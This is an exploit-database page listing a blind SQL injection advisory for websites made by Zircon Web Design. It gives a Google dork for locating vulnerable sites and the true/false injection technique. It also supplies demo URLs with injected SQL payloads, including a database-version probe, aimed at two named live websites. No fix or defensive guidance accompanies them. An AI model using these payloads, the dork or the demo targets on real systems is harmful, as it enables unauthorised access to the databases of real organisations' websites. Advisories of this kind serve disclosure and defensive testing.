Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-09-27 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:8.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H | 0.24 | 0.76893 |
********************************************************* #Exploit Title: Zircon Web Desig - Blind Sql Injection Vulnerability #Date: 2021-09-25 #Exploit Author: Behrouz Mansoori #Google Dork: "Website Design and Hosted by Zircon Web Design" #Category:webapps #Tested On: windows 10, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * http://www.nlcrt.ca/main_page.php?id=4%27%20and%20true--+ * http://www.nlcrt.ca/main_page.php?id=4%27%20and%20false--+ * http://www.nlcrt.ca/main_page.php?id=4%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * http://www.townofwabana.ca/iframe.php?id=185%27%20and%20false--+&cms_id=5&subcms_id=2 * http://www.townofwabana.ca/iframe.php?id=185%27%20and%20true--+&cms_id=5&subcms_id=2 * http://www.townofwabana.ca/iframe.php?id=185%27%20and%20substring(@@version,1,1)=1--+&cms_id=5&subcms_id=2 ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.